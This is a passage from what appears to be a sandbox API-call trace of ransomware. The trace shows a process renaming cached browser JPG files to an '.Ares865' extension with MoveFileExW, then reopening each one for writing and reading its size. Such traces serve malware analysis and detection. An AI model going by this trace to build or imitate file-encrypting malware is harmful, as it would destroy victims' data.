files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2427) returned 1 [0096.868] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg.Ares865") returned 117 [0096.868] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.870] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1690) returned 1 [0096.872] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg.Ares865") returned 117 [0096.873] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.874] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1744) returned 1 [0096.877] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg.Ares865") returned 117 [0096.877] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.878] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1671) returned 1 [0096.881] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg.Ares865") returned 117 [0096.881] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.883] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9416) returned 1 [0096.886] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg.Ares865") returned 117 [0096.886] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.888] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13335) returned 1 [0096.891] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg.Ares865") returned 117 [0096.891] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.892] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3083) returned 1 [0096.896] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg.Ares865") returned 117 [0096.896] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.898] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15436) returned 1 [0096.902] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg.Ares865") returned 117 [0096.902] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.903] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7950) returned 1 [0096.907] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg.Ares865") returned 117 [0096.907] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.908] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2432) returned 1 [0096.914] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg.Ares865") returned 117 [0096.914] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.915] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9213) returned 1 [0096.921] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg.Ares865") returned 117 [0096.921] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.922] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6745) returned 1 [0096.926] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg.Ares865") returned 117 [0096.926] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.927] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1968) returned 1 [0096.931] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg.Ares865") returned 117 [0096.931] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.932] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17644) returned 1 [0096.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg.Ares865") returned 117 [0096.936] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.938] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5915) returned 1 [0096.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg.Ares865") returned 117 [0096.944] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg.ares865"), dwFlags=0x1) returned 1 [0096.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6182) returned 1 [0096.949] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg.Ares865") returned 117 [0096.949] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.950] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1509) returned 1 [0096.953] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg.Ares865") returned 117 [0096.953] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg.ares865"), dwFlags=0x1) returned 1 [0096.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 